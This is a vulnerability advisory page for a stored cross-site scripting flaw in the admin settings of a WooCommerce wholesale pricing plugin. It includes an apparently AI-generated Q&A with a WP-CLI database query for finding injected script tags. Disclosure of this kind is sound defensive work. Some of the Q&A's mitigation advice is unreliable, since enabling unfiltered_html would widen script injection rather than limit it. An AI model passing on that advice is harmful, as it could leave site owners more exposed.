CVE-2026-4479
Stored XSS in WooCommerce WholeSale Pricing Plugin Admin Settings
Publication date: 2026-04-14
Last updated on: 2026-04-14
Assigner: Wordfence
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| woocommerce | whole_sale_products_dynamic_pricing_management | to 1.2 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The WholeSale Products Dynamic Pricing Management WooCommerce plugin for WordPress has a Stored Cross-Site Scripting (XSS) vulnerability in all versions up to and including 1.2. This vulnerability arises due to insufficient input sanitization and output escaping in the admin settings.
Authenticated attackers with administrator-level permissions or higher can inject arbitrary web scripts into pages. These scripts execute whenever a user accesses the injected page.
This vulnerability specifically affects multi-site WordPress installations and installations where the unfiltered_html setting has been disabled.
How can this vulnerability impact me? :
This vulnerability allows attackers with admin-level access to inject malicious scripts that execute in the context of users visiting the affected pages.
Such script execution can lead to theft of sensitive information, session hijacking, or other malicious actions performed on behalf of the user.
Because the vulnerability requires high privileges and affects multi-site setups or those with unfiltered_html disabled, the impact is limited to environments with these configurations.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves Stored Cross-Site Scripting (XSS) via admin settings in the WholeSale Products Dynamic Pricing Management WooCommerce plugin for WordPress. Detection typically requires checking for injected scripts in the admin settings pages, especially in multi-site installations or where unfiltered_html is disabled.
Since the vulnerability requires administrator-level permissions and affects stored data, detection commands would involve inspecting the database or admin pages for suspicious script tags or payloads.
- Use WP-CLI to search for suspicious script tags in the plugin's settings: wp db query "SELECT * FROM wp_options WHERE option_name LIKE '%whole_sale_products_dynamic_pricing_management%' AND option_value LIKE '%<script>%'"
- Manually review the admin settings pages for unexpected or suspicious content.
- Monitor HTTP responses from admin pages for injected scripts using tools like curl or browser developer tools.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediate steps include:
- Update the WholeSale Products Dynamic Pricing Management WooCommerce plugin to a version later than 1.2 where the vulnerability is fixed.
- Restrict administrator-level access to trusted users only, as exploitation requires such permissions.
- If updating is not immediately possible, consider disabling the plugin or limiting multi-site usage and enabling unfiltered_html cautiously.
- Regularly audit and sanitize admin settings to remove any injected scripts.